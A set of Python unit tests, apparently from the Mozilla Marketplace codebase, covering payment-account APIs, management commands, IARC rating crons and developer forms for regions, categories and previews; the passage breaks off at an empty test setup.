        eq_(res.status_code, 404, res.content)
        self.other_account.reload()
        eq_(self.other_account.inactive, False)

    def test_create_fail(self):
        # A solitude client error is surfaced as a 500 with its payload.
        err = {'broken': True}
        self.bango_patcher.package.post.side_effect = HttpClientError(
            content=err)
        res = self.client.post(self.payment_list,
                               data=json.dumps(payment_data))
        eq_(res.status_code, 500)
        eq_(json.loads(res.content), err)

    def test_create_fail2(self):
        self.bango_patcher.package.post.side_effect = HttpServerError()
        res = self.client.post(self.payment_list,
                               data=json.dumps(payment_data))
        eq_(res.status_code, 500)
class TestAddonPaymentAccount(AccountCase, RestOAuth):
    """API tests for linking payment accounts to apps."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_2519')

    def test_empty(self):
        eq_(self.client.post(self.app_payment_list, data={}).status_code, 400)

    def test_not_allowed(self):
        res = self.client.post(self.app_payment_list,
                               data=json.dumps(self.data()))
        eq_(res.status_code, 403)

    def test_allowed(self):
        self.bango_patcher.product.get_object_or_404.return_value = {
            'resource_uri': '/f/b'}
        self.create_price()
        self.create_user()
        res = self.client.post(self.app_payment_list,
                               data=json.dumps(self.data()))
        eq_(res.status_code, 201, res.content)
        account = AddonPaymentAccount.objects.get()
        eq_(account.payment_account, self.account)

    def test_cant_change_addon(self):
        app = app_factory(premium_type=amo.ADDON_PREMIUM)
        AddonUser.objects.create(addon=app, user=self.profile)
        self.create()
        self.create_price()
        self.create_user()
        data = self.data({'payment_account': self.payment_url,
                          'addon': app.get_api_url(pk=True)})
        res = self.client.patch(self.app_payment_detail, data=json.dumps(data))
        # Ideally we should make this a 400.
        eq_(res.status_code, 403, res.content)

    def test_cant_use_someone_elses(self):
        data = self.other(shared=False)
        self.create_price()
        self.create_user()
        res = self.client.post(self.app_payment_list, data=json.dumps(data))
        eq_(res.status_code, 403, res.content)

    def test_can_shared(self):
        # A shared account belonging to another user may be used.
        self.bango_patcher.product.get_object_or_404.return_value = {
            'resource_uri': '/f/b'}
        data = self.other(shared=True)
        self.create_price()
        self.create_user()
        res = self.client.post(self.app_payment_list, data=json.dumps(data))
        eq_(res.status_code, 201, res.content)
class TestPaymentStatus(AccountCase, RestOAuth):
    """API tests for the per-app payment status endpoint."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_2519')

    def setUp(self):
        super(TestPaymentStatus, self).setUp()
        self.create()
        self.payment.account_uri = '/bango/package/1/'
        self.payment.save()
        self.list_url = reverse('app-payments-status-list',
                                kwargs={'pk': 337141})

    def test_no_auth(self):
        eq_(self.anon.post(self.list_url, data={}).status_code, 403)

    def test_not_owner(self):
        eq_(self.client.post(self.list_url, data={}).status_code, 403)

    def test_no_account(self):
        self.payment.delete()
        eq_(self.client.post(self.list_url, data={}).status_code, 400)

    @patch('mkt.developers.api_payments.get_client')
    def test_owner(self, get_client):
        client = Mock()
        client.api.bango.status.post.return_value = {'status': 1}
        get_client.return_value = client
        AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
        res = self.client.post(self.list_url, data={})
        eq_(res.json['bango']['status'], 'passed')
        eq_(res.status_code, 200)
class TestPaymentDebug(AccountCase, RestOAuth):
    """Tests for the payments debug endpoint: requires Transaction:Debug
    permission and proxies Bango debug info back to the caller."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_2519')

    def setUp(self):
        super(TestPaymentDebug, self).setUp()
        self.create()
        self.payment.account_uri = '/bango/package/1/'
        self.payment.save()
        self.list_url = reverse('app-payments-debug-list',
                                kwargs={'pk': 337141})

    def test_no_auth(self):
        eq_(self.anon.get(self.list_url).status_code, 403)

    def test_no_perms(self):
        # Authenticated but lacking Transaction:Debug: forbidden.
        eq_(self.client.get(self.list_url).status_code, 403)

    @patch('mkt.developers.api_payments.get_client')
    def test_good(self, get_client):
        # With the permission granted, the Bango debug payload is returned.
        client = Mock()
        client.api.bango.debug.get.return_value = {'bango':
                                                   {'environment': 'dev'}}
        get_client.return_value = client
        self.app.update(premium_type=amo.ADDON_FREE_INAPP)
        self.grant_permission(self.profile, 'Transaction:Debug')
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        eq_(res.json['bango']['environment'], 'dev')
class Form(forms.Form):
    # Minimal fixture form for TestPaymentAppViewSet below: only the value
    # 'valid' passes ChoiceField validation.
    app = forms.ChoiceField(choices=(('valid', 'valid'),))
class TestPaymentAppViewSet(TestCase):
    """PaymentAppViewSet.initialize_request should resolve `pk` through its
    form: a valid pk sets `self.app`, an invalid one leaves it None."""

    def setUp(self):
        self.request = RequestFactory().get('/')
        self.viewset = PaymentAppViewSet()
        self.viewset.action_map = {}
        # Swap in the minimal Form defined above.
        self.viewset.form = Form

    def test_ok(self):
        self.viewset.initialize_request(self.request, pk='valid')
        ok_(self.viewset.app)

    def test_not_ok(self):
        self.viewset.initialize_request(self.request, pk='invalid')
        eq_(self.viewset.app, None)
########NEW FILE########
__FILENAME__ = test_commands
# -*- coding: utf-8 -*-
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import AddonPremium, Category
import mkt
from mkt.developers.management.commands import (cleanup_addon_premium,
exclude_games, migrate_geodata,
refresh_iarc_ratings,
remove_old_aers)
from mkt.site.fixtures import fixture
from mkt.webapps.models import IARCInfo, RatingDescriptors, Webapp
class TestCommandViews(amo.tests.TestCase):
    """cleanup_addon_premium should delete AddonPremium rows only for apps
    that are no longer premium."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)

    def test_cleanup_addonpremium(self):
        self.make_premium(self.webapp)
        eq_(AddonPremium.objects.all().count(), 1)
        # Still premium: the row must survive.
        cleanup_addon_premium.Command().handle()
        eq_(AddonPremium.objects.all().count(), 1)
        # Downgraded to free: the row must be removed.
        self.webapp.update(premium_type=amo.ADDON_FREE)
        cleanup_addon_premium.Command().handle()
        eq_(AddonPremium.objects.all().count(), 0)
class TestMigrateGeodata(amo.tests.TestCase):
    """migrate_geodata: paid-app exclusions become 'restricted' geodata and
    are kept; free-app exclusions are dropped; a single remaining region
    becomes the popular_region."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)

    def test_restricted_no_migration_of_paid_apps_exclusions(self):
        self.make_premium(self.webapp)
        self.webapp.addonexcludedregion.create(region=mkt.regions.US.id)
        eq_(self.webapp.geodata.reload().restricted, False)
        migrate_geodata.Command().handle()
        # Paid app: exclusion is kept and the app is flagged restricted.
        eq_(self.webapp.reload().addonexcludedregion.count(), 1)
        eq_(self.webapp.geodata.reload().restricted, True)

    def test_unrestricted_migration_of_free_apps_exclusions(self):
        self.webapp.addonexcludedregion.create(region=mkt.regions.US.id)
        eq_(self.webapp.geodata.reload().restricted, False)
        migrate_geodata.Command().handle()
        # Free app: exclusion is dropped, restricted stays False.
        eq_(self.webapp.reload().addonexcludedregion.count(), 0)
        eq_(self.webapp.geodata.reload().restricted, False)

    def test_migration_of_regional_content(self):
        # Exclude in everywhere except Brazil.
        regions = list(mkt.regions.REGIONS_CHOICES_ID_DICT)
        regions.remove(mkt.regions.BR.id)
        for region in regions:
            self.webapp.addonexcludedregion.create(region=region)
        eq_(self.webapp.geodata.reload().popular_region, None)
        migrate_geodata.Command().handle()
        # Only the China (special region) exclusion is expected to remain.
        self.assertSetEqual(self.webapp.reload().addonexcludedregion
                                .values_list('region', flat=True),
                            [mkt.regions.CN.id])
        eq_(self.webapp.geodata.reload().popular_region, mkt.regions.BR.slug)
class TestExcludeUnratedGames(amo.tests.TestCase):
    """exclude_games: unrated games are IARC-excluded from Brazil and
    Germany; non-games and rated games are untouched; a rating from the
    relevant body (USK for Germany, CLASSIND for Brazil) keeps the app
    listed there."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)

    def _germany_listed(self):
        # Listed in Germany means the DE IARC-exclusion flag is NOT set.
        return not self.webapp.geodata.reload().region_de_iarc_exclude

    def _brazil_listed(self):
        return not self.webapp.geodata.reload().region_br_iarc_exclude

    def test_exclude_unrated(self):
        amo.tests.make_game(self.webapp, rated=False)
        exclude_games.Command().handle()
        assert not self._brazil_listed()
        assert not self._germany_listed()

    def test_dont_exclude_non_game(self):
        exclude_games.Command().handle()
        assert self._brazil_listed()
        assert self._germany_listed()

    def test_dont_exclude_rated(self):
        amo.tests.make_game(self.webapp, rated=True)
        exclude_games.Command().handle()
        assert self._brazil_listed()
        assert self._germany_listed()

    def test_germany_case_generic(self):
        # A GENERIC rating does not satisfy Germany (USK) or Brazil.
        amo.tests.make_game(self.webapp, rated=False)
        self.webapp.set_content_ratings({
            mkt.ratingsbodies.GENERIC: mkt.ratingsbodies.GENERIC_18
        })
        exclude_games.Command().handle()
        assert not self._germany_listed()
        assert not self._brazil_listed()

    def test_germany_case_usk(self):
        # A USK rating keeps the app listed in Germany only.
        amo.tests.make_game(self.webapp, rated=False)
        self.webapp.set_content_ratings({
            mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_18
        })
        exclude_games.Command().handle()
        assert self._germany_listed()
        assert not self._brazil_listed()

    def test_brazil_case_classind(self):
        # A CLASSIND rating keeps the app listed in Brazil only.
        amo.tests.make_game(self.webapp, rated=False)
        self.webapp.set_content_ratings({
            mkt.ratingsbodies.CLASSIND: mkt.ratingsbodies.CLASSIND_L
        })
        exclude_games.Command().handle()
        assert self._brazil_listed()
        assert not self._germany_listed()
class TestRemoveOldAERs(amo.tests.TestCase):
    """remove_old_aers: legacy BR/DE game exclusions are deleted, but only
    when they were NOT accompanied by user-made exclusions."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)
        # The command only targets apps in the 'games' category.
        self.webapp.addoncategory_set.create(
            category=Category.objects.create(slug='games',
                                             type=amo.ADDON_WEBAPP))

    def test_delete(self):
        self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
        self.webapp.addonexcludedregion.create(region=mkt.regions.DE.id)
        remove_old_aers.Command().handle()
        eq_(self.webapp.addonexcludedregion.count(), 0)

    def test_user_excluded_no_delete(self):
        # The extra MX exclusion marks these as deliberate; keep all three.
        self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
        self.webapp.addonexcludedregion.create(region=mkt.regions.DE.id)
        self.webapp.addonexcludedregion.create(region=mkt.regions.MX.id)
        remove_old_aers.Command().handle()
        eq_(self.webapp.addonexcludedregion.count(), 3)
class TestRefreshIARCRatings(amo.tests.TestCase):
    """refresh_iarc_ratings: re-fetches ratings/descriptors/interactives from
    IARC for apps that have an IARC cert; skips apps without one; supports
    restricting to specific app ids."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)

    def test_refresh_create(self):
        IARCInfo.objects.create(
            addon=self.webapp, submission_id=52, security_code='FZ32CU8')
        refresh_iarc_ratings.Command().handle()
        ok_(self.webapp.rating_descriptors)
        ok_(self.webapp.rating_interactives)
        ok_(self.webapp.content_ratings.count())

    def test_refresh_update(self):
        IARCInfo.objects.create(
            addon=self.webapp, submission_id=52, security_code='FZ32CU8')
        rd = RatingDescriptors.objects.create(
            addon=self.webapp, has_usk_violence=True)
        refresh_iarc_ratings.Command().handle()
        # Existing descriptors are replaced by the fetched ones.
        ok_(rd.reload().has_esrb_strong_lang)
        ok_(not rd.has_usk_violence)

    def test_no_cert_no_refresh(self):
        refresh_iarc_ratings.Command().handle()
        ok_(not self.webapp.content_ratings.count())

    def test_single_app(self):
        IARCInfo.objects.create(
            addon=self.webapp, submission_id=52, security_code='FZ32CU8')
        # The 'apps' option limits the refresh to the given ids.
        refresh_iarc_ratings.Command().handle(apps=unicode(self.webapp.id))
        ok_(self.webapp.content_ratings.count())
########NEW FILE########
__FILENAME__ = test_cron
# -*- coding: utf-8 -*-
import datetime
import mock
from nose.tools import eq_
import amo.tests
from devhub.models import ActivityLog
import mkt
import mkt.constants
from mkt.developers.cron import (_flag_rereview_adult, exclude_new_region,
process_iarc_changes, send_new_region_emails)
from mkt.webapps.models import IARCInfo, RatingDescriptors, RatingInteractives
class TestSendNewRegionEmails(amo.tests.WebappTestCase):
    """send_new_region_emails should email only apps that opted into new
    regions and are not already excluded from the region."""

    @mock.patch('mkt.developers.cron._region_email')
    def test_called(self, _region_email_mock):
        self.app.update(enable_new_regions=True)
        send_new_region_emails([mkt.regions.UK])
        eq_(list(_region_email_mock.call_args_list[0][0][0]), [self.app.id])

    @mock.patch('mkt.developers.cron._region_email')
    def test_not_called_with_exclusions(self, _region_email_mock):
        # An existing exclusion for the region suppresses the email.
        self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
        send_new_region_emails([mkt.regions.UK])
        eq_(list(_region_email_mock.call_args_list[0][0][0]), [])

    @mock.patch('mkt.developers.cron._region_email')
    def test_not_called_with_enable_new_regions_false(self,
                                                      _region_email_mock):
        """Check enable_new_regions is False by default."""
        eq_(self.app.enable_new_regions, False)
        send_new_region_emails([mkt.regions.UK])
        eq_(list(_region_email_mock.call_args_list[0][0][0]), [])
class TestExcludeNewRegion(amo.tests.WebappTestCase):
    """exclude_new_region: the inverse of the email cron — apps that did NOT
    opt into new regions get excluded; opted-in or already-excluded apps are
    left alone."""

    @mock.patch('mkt.developers.cron._region_exclude')
    def test_not_called_enable_new_regions_true(self, _region_exclude_mock):
        self.app.update(enable_new_regions=True)
        exclude_new_region([mkt.regions.UK])
        eq_(list(_region_exclude_mock.call_args_list[0][0][0]), [])

    @mock.patch('mkt.developers.cron._region_exclude')
    def test_not_called_with_ordinary_exclusions(self, _region_exclude_mock):
        self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
        exclude_new_region([mkt.regions.UK])
        eq_(list(_region_exclude_mock.call_args_list[0][0][0]), [])

    @mock.patch('mkt.developers.cron._region_exclude')
    def test_called_with_enable_new_regions_false(self, _region_exclude_mock):
        # Check enable_new_regions is False by default.
        eq_(self.app.enable_new_regions, False)
        exclude_new_region([mkt.regions.UK])
        eq_(list(_region_exclude_mock.call_args_list[0][0][0]), [self.app.id])
class TestIARCChangesCron(amo.tests.TestCase):
    """process_iarc_changes: date-window defaults, application of the mock
    IARC feed to a matching app, and re-review flagging when a rating jumps
    to adult."""

    @mock.patch('lib.iarc.utils.render_xml')
    def test_no_date(self, _render):
        # Without an explicit date, the window is yesterday..today.
        process_iarc_changes()
        _render.assert_called_with('get_rating_changes.xml', {
            'date_from': datetime.date.today() - datetime.timedelta(days=1),
            'date_to': datetime.date.today(),
        })

    @mock.patch('lib.iarc.utils.render_xml')
    def test_with_date(self, _render):
        date = datetime.date(2001, 1, 11)
        process_iarc_changes(date.strftime('%Y-%m-%d'))
        _render.assert_called_with('get_rating_changes.xml', {
            'date_from': date - datetime.timedelta(days=1),
            'date_to': date,
        })

    def test_processing(self):
        """
        The mock client always returns the same data. Set up the app so it
        matches the submission ID and verify the data is saved as expected.
        """
        amo.set_user(amo.tests.user_factory())
        app = amo.tests.app_factory()
        IARCInfo.objects.create(addon=app, submission_id=52,
                                security_code='FZ32CU8')
        app.set_descriptors([
            'has_classind_violence',
            'has_esrb_strong_lang',
            'has_pegi_language', 'has_pegi_online',
            'has_usk_lang',
        ])
        app.set_content_ratings({
            mkt.ratingsbodies.CLASSIND: mkt.ratingsbodies.CLASSIND_L
        })
        process_iarc_changes()
        app = app.reload()
        # Check ratings. CLASSIND should get updated.
        cr = app.content_ratings.get(
            ratings_body=mkt.ratingsbodies.CLASSIND.id)
        eq_(cr.rating, mkt.ratingsbodies.CLASSIND_14.id)
        cr = app.content_ratings.get(ratings_body=mkt.ratingsbodies.ESRB.id)
        eq_(cr.rating, mkt.ratingsbodies.ESRB_M.id)
        assert ActivityLog.objects.filter(
            action=amo.LOG.CONTENT_RATING_CHANGED.id).count()
        # Check descriptors.
        rd = RatingDescriptors.objects.get(addon=app)
        self.assertSetEqual(rd.to_keys(), [
            'has_esrb_strong_lang',
            'has_classind_lang', 'has_classind_sex_content',
            'has_pegi_lang', 'has_pegi_online',
            'has_usk_lang',
        ])
        # Check interactives.
        ri = RatingInteractives.objects.get(addon=app)
        self.assertSetEqual(ri.to_keys(), [
            'has_shares_info', 'has_shares_location', 'has_digital_purchases',
            'has_users_interact'
        ])

    def test_rereview_flag_adult(self):
        amo.set_user(amo.tests.user_factory())
        app = amo.tests.app_factory()
        app.set_content_ratings({
            mkt.ratingsbodies.ESRB: mkt.ratingsbodies.ESRB_E,
            mkt.ratingsbodies.CLASSIND: mkt.ratingsbodies.CLASSIND_18,
        })
        # Change to a non-adult rating: no re-review, no log entry.
        _flag_rereview_adult(app, mkt.ratingsbodies.ESRB,
                             mkt.ratingsbodies.ESRB_T)
        assert not app.rereviewqueue_set.count()
        assert not ActivityLog.objects.filter(
            action=amo.LOG.CONTENT_RATING_TO_ADULT.id).exists()
        # Adult should get flagged to rereview.
        _flag_rereview_adult(app, mkt.ratingsbodies.ESRB,
                             mkt.ratingsbodies.ESRB_A)
        eq_(app.rereviewqueue_set.count(), 1)
        eq_(ActivityLog.objects.filter(
            action=amo.LOG.CONTENT_RATING_TO_ADULT.id).count(), 1)
        # Nothing changes when the rating stays at the same adult rating.
        app.set_content_ratings({
            mkt.ratingsbodies.ESRB: mkt.ratingsbodies.ESRB_A,
        })
        _flag_rereview_adult(app, mkt.ratingsbodies.ESRB,
                             mkt.ratingsbodies.ESRB_A)
        eq_(app.rereviewqueue_set.count(), 1)
        eq_(ActivityLog.objects.filter(
            action=amo.LOG.CONTENT_RATING_TO_ADULT.id).count(), 1)
########NEW FILE########
__FILENAME__ = test_forms
# -*- coding: utf-8 -*-
import json
import os
import shutil
from django import forms as django_forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.files.uploadedfile import SimpleUploadedFile
import mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from amo.tests import app_factory, version_factory
from amo.tests.test_helpers import get_image_path
from addons.models import Addon, AddonCategory, Category
from tags.models import Tag
from translations.models import Translation
from users.models import UserProfile
import mkt
from mkt.developers import forms
from mkt.developers.tests.test_views_edit import TestAdmin
from mkt.files.helpers import copyfileobj
from mkt.site.fixtures import fixture
from mkt.webapps.models import Geodata, IARCInfo, Webapp
class TestPreviewForm(amo.tests.TestCase):
    """Tests for forms.PreviewForm: saving previews updates the addon,
    records image sizes, and derives the file type from the upload hash."""
    fixtures = ['base/addon_3615']

    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.dest = os.path.join(settings.TMP_PATH, 'preview')
        if not os.path.exists(self.dest):
            os.makedirs(self.dest)

    @mock.patch('amo.models.ModelBase.update')
    def test_preview_modified(self, update_mock):
        name = 'transparent.png'
        form = forms.PreviewForm({'upload_hash': name,
                                  'position': 1})
        shutil.copyfile(get_image_path(name), os.path.join(self.dest, name))
        assert form.is_valid(), form.errors
        form.save(self.addon)
        assert update_mock.called

    def test_preview_size(self):
        name = 'non-animated.gif'
        form = forms.PreviewForm({'upload_hash': name,
                                  'position': 1})
        # Fix: close the source file handle instead of leaking it
        # (the original passed a bare open(...) to copyfileobj).
        with open(get_image_path(name)) as src:
            with storage.open(os.path.join(self.dest, name), 'wb') as f:
                copyfileobj(src, f)
        assert form.is_valid(), form.errors
        form.save(self.addon)
        eq_(self.addon.previews.all()[0].sizes,
            {u'image': [250, 297], u'thumbnail': [100, 119]})

    def check_file_type(self, type_):
        # Helper: save a preview whose upload hash carries the given
        # extension marker and return the resulting filetype.
        form = forms.PreviewForm({'upload_hash': type_,
                                  'position': 1})
        assert form.is_valid(), form.errors
        form.save(self.addon)
        return self.addon.previews.all()[0].filetype

    @mock.patch('lib.video.tasks.resize_video')
    def test_preview_good_file_type(self, resize_video):
        eq_(self.check_file_type('x.video-webm'), 'video/webm')

    def test_preview_other_file_type(self):
        # No recognized extension defaults to image/png.
        eq_(self.check_file_type('x'), 'image/png')

    def test_preview_bad_file_type(self):
        eq_(self.check_file_type('x.foo'), 'image/png')
class TestCategoryForm(amo.tests.WebappTestCase):
    """forms.CategoryForm: queryset of available webapp categories and the
    max-categories limit when saving."""
    fixtures = fixture('user_999', 'webapp_337141')

    def setUp(self):
        super(TestCategoryForm, self).setUp()
        self.user = UserProfile.objects.get(username='regularuser')
        self.app = Webapp.objects.get(pk=337141)
        self.request = RequestFactory()
        self.request.user = self.user
        self.request.groups = ()
        self.cat = Category.objects.create(type=amo.ADDON_WEBAPP)

    def _make_form(self, data=None):
        self.form = forms.CategoryForm(
            data, product=self.app, request=self.request)

    def _cat_count(self):
        return self.form.fields['categories'].queryset.count()

    def test_has_no_cats(self):
        self._make_form()
        eq_(self._cat_count(), 1)
        eq_(self.form.max_categories(), 2)

    def test_save_cats(self):
        # Select every webapp category and save; all should be attached.
        self._make_form({'categories':
                         map(str, Category.objects.filter(type=amo.ADDON_WEBAPP)
                             .values_list('id', flat=True))})
        assert self.form.is_valid(), self.form.errors
        self.form.save()
        eq_(AddonCategory.objects.filter(addon=self.app).count(),
            Category.objects.count())
        eq_(self.form.max_categories(), 2)
class TestRegionForm(amo.tests.WebappTestCase):
    """forms.RegionForm: initial region selection derived from exclusions,
    validation rules, saving exclusions/re-inclusions, and the special-region
    (China) approval workflow behind the 'special-regions' flag."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestRegionForm, self).setUp()
        self.request = RequestFactory()
        self.kwargs = {'product': self.app}

    def test_initial_empty(self):
        # No exclusions: all normal regions selected, special regions not.
        form = forms.RegionForm(data=None, **self.kwargs)
        self.assertSetEqual(form.initial['regions'],
                            set(mkt.regions.ALL_REGION_IDS) -
                            set(mkt.regions.SPECIAL_REGION_IDS))
        eq_(form.initial['enable_new_regions'], False)

    def test_initial_excluded_in_region(self):
        self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
        # Everything except Brazil.
        regions = set(mkt.regions.ALL_REGION_IDS)
        regions.remove(mkt.regions.BR.id)
        self.assertSetEqual(self.get_app().get_region_ids(restofworld=True),
                            regions)
        form = forms.RegionForm(data=None, **self.kwargs)
        # Everything except Brazil and China.
        self.assertSetEqual(form.initial['regions'],
                            regions - set(mkt.regions.SPECIAL_REGION_IDS))
        eq_(form.initial['enable_new_regions'], False)

    def test_initial_excluded_in_regions_and_future_regions(self):
        regions = [mkt.regions.BR, mkt.regions.UK, mkt.regions.RESTOFWORLD]
        for region in regions:
            self.app.addonexcludedregion.create(region=region.id)
        regions = set(mkt.regions.ALL_REGION_IDS)
        regions.remove(mkt.regions.BR.id)
        regions.remove(mkt.regions.UK.id)
        regions.remove(mkt.regions.RESTOFWORLD.id)
        self.assertSetEqual(self.get_app().get_region_ids(),
                            regions)
        form = forms.RegionForm(data=None, **self.kwargs)
        self.assertSetEqual(form.initial['regions'],
                            regions - set(mkt.regions.SPECIAL_REGION_IDS))
        eq_(form.initial['enable_new_regions'], False)

    def test_restofworld_only(self):
        form = forms.RegionForm({'regions': [mkt.regions.RESTOFWORLD.id]},
                                **self.kwargs)
        assert form.is_valid(), form.errors

    def test_no_regions(self):
        # At least one region must be selected.
        form = forms.RegionForm({'enable_new_regions': True}, **self.kwargs)
        assert not form.is_valid(), 'Form should be invalid'
        eq_(form.errors,
            {'regions': ['You must select at least one region.']})

    def test_exclude_each_region(self):
        """Test that it's possible to exclude each region."""
        for region_id in mkt.regions.ALL_REGION_IDS:
            to_exclude = list(mkt.regions.ALL_REGION_IDS)
            to_exclude.remove(region_id)
            form = forms.RegionForm({'regions': to_exclude,
                                     'restricted': '1',
                                     'enable_new_regions': True},
                                    **self.kwargs)
            assert form.is_valid(), form.errors
            form.save()
            r_id = mkt.regions.REGIONS_CHOICES_ID_DICT[region_id]
            eq_(self.app.reload().get_region_ids(True), to_exclude,
                'Failed for %s' % r_id)

    def test_exclude_restofworld(self):
        form = forms.RegionForm({'regions': mkt.regions.REGION_IDS,
                                 'restricted': '1',
                                 'enable_new_regions': False}, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.app.get_region_ids(True), mkt.regions.REGION_IDS)

    def test_reinclude_region(self):
        self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
        form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS,
                                 'enable_new_regions': True}, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.app.get_region_ids(True), mkt.regions.ALL_REGION_IDS)

    def test_reinclude_restofworld(self):
        self.app.addonexcludedregion.create(
            region=mkt.regions.RESTOFWORLD.id)
        form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS},
                                **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.app.get_region_ids(True), mkt.regions.ALL_REGION_IDS)

    def test_restofworld_valid_choice_paid(self):
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        form = forms.RegionForm(
            {'regions': [mkt.regions.RESTOFWORLD.id]}, **self.kwargs)
        assert form.is_valid(), form.errors

    def test_restofworld_valid_choice_free(self):
        form = forms.RegionForm(
            {'regions': [mkt.regions.RESTOFWORLD.id]}, **self.kwargs)
        assert form.is_valid(), form.errors

    def test_china_initially_excluded_if_null(self):
        self.create_flag('special-regions')
        form = forms.RegionForm(None, **self.kwargs)
        cn = mkt.regions.CN.id
        # China is not pre-selected but is still offered as a choice.
        assert cn not in form.initial['regions']
        assert cn in dict(form.fields['regions'].choices).keys()

    def _test_china_excluded_if_pending_or_rejected(self):
        # Shared helper: exercised for both PENDING and REJECTED statuses.
        self.create_flag('special-regions')
        # Mark app as pending/rejected in China.
        for status in (amo.STATUS_PENDING, amo.STATUS_REJECTED):
            self.app.geodata.set_status(mkt.regions.CN, status, save=True)
            eq_(self.app.geodata.get_status(mkt.regions.CN), status)
            # Post the form.
            form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS,
                                     'special_regions': [mkt.regions.CN.id]},
                                    **self.kwargs)
            # China should be checked if it's pending and
            # unchecked if rejected.
            cn = mkt.regions.CN.id
            if status == amo.STATUS_PENDING:
                assert cn in form.initial['regions'], (
                    status, form.initial['regions'])
            else:
                assert cn not in form.initial['regions'], (
                    status, form.initial['regions'])
            choices = dict(form.fields['regions'].choices).keys()
            assert cn in choices, (status, choices)
            assert form.is_valid(), form.errors
            form.save()
            # App should be unlisted in China and always pending after
            # requesting China.
            self.app = self.app.reload()
            eq_(self.app.listed_in(mkt.regions.CN), False)
            eq_(self.app.geodata.get_status(mkt.regions.CN),
                amo.STATUS_PENDING)

    def test_china_excluded_if_pending_or_rejected(self):
        self._test_china_excluded_if_pending_or_rejected()

    def test_china_already_excluded_and_pending_or_rejected(self):
        cn = mkt.regions.CN.id
        self.app.addonexcludedregion.create(region=cn)
        # If the app was already excluded in China, the checkbox should still
        # be checked if the app's been requested for approval in China now.
        self._test_china_excluded_if_pending_or_rejected()

    def test_china_excluded_if_pending_cancelled(self):
        """
        If the developer already requested to be in China,
        and a reviewer hasn't reviewed it for China yet,
        keep the region exclusion and the status as pending.
        """
        self.create_flag('special-regions')
        # Mark app as pending in China.
        status = amo.STATUS_PENDING
        self.app.geodata.set_status(mkt.regions.CN, status, save=True)
        eq_(self.app.geodata.get_status(mkt.regions.CN), status)
        # Post the form.
        form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS},
                                **self.kwargs)
        # China should be checked if it's pending.
        cn = mkt.regions.CN.id
        assert cn in form.initial['regions']
        assert cn in dict(form.fields['regions'].choices).keys()
        assert form.is_valid(), form.errors
        form.save()
        # App should be unlisted in China and now null.
        self.app = self.app.reload()
        eq_(self.app.listed_in(mkt.regions.CN), False)
        eq_(self.app.geodata.get_status(mkt.regions.CN), amo.STATUS_NULL)

    def test_china_included_if_approved_but_unchecked(self):
        self.create_flag('special-regions')
        # Mark app as public in China.
        status = amo.STATUS_PUBLIC
        self.app.geodata.set_status(mkt.regions.CN, status, save=True)
        eq_(self.app.geodata.get_status(mkt.regions.CN), status)
        # Post the form.
        form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS},
                                **self.kwargs)
        # China should be checked if it's public.
        cn = mkt.regions.CN.id
        assert cn in form.initial['regions']
        assert cn in dict(form.fields['regions'].choices).keys()
        assert form.is_valid(), form.errors
        form.save()
        # App should be unlisted in China and now null.
        self.app = self.app.reload()
        eq_(self.app.listed_in(mkt.regions.CN), False)
        eq_(self.app.geodata.get_status(mkt.regions.CN), amo.STATUS_NULL)

    def test_china_included_if_approved_and_checked(self):
        self.create_flag('special-regions')
        # Mark app as public in China.
        status = amo.STATUS_PUBLIC
        self.app.geodata.set_status(mkt.regions.CN, status, save=True)
        eq_(self.app.geodata.get_status(mkt.regions.CN), status)
        # Post the form.
        form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS,
                                 'special_regions': [mkt.regions.CN.id]},
                                **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        # App should still be listed in China and still public.
        self.app = self.app.reload()
        eq_(self.app.listed_in(mkt.regions.CN), True)
        eq_(self.app.geodata.get_status(mkt.regions.CN), status)
class TestNewManifestForm(amo.tests.TestCase):
    """forms.NewManifestForm: the app-domain uniqueness check runs for
    normal submissions but is skipped in standalone mode."""

    @mock.patch('mkt.developers.forms.verify_app_domain')
    def test_normal_validator(self, _verify_app_domain):
        form = forms.NewManifestForm({'manifest': 'http://omg.org/yes.webapp'},
                                     is_standalone=False)
        assert form.is_valid()
        assert _verify_app_domain.called

    @mock.patch('mkt.developers.forms.verify_app_domain')
    def test_standalone_validator(self, _verify_app_domain):
        form = forms.NewManifestForm({'manifest': 'http://omg.org/yes.webapp'},
                                     is_standalone=True)
        assert form.is_valid()
        assert not _verify_app_domain.called
class TestPackagedAppForm(amo.tests.AMOPaths, amo.tests.WebappTestCase):
    """forms.NewPackagedAppForm: required upload, size limit, and the
    one-app-per-domain rule."""

    def setUp(self):
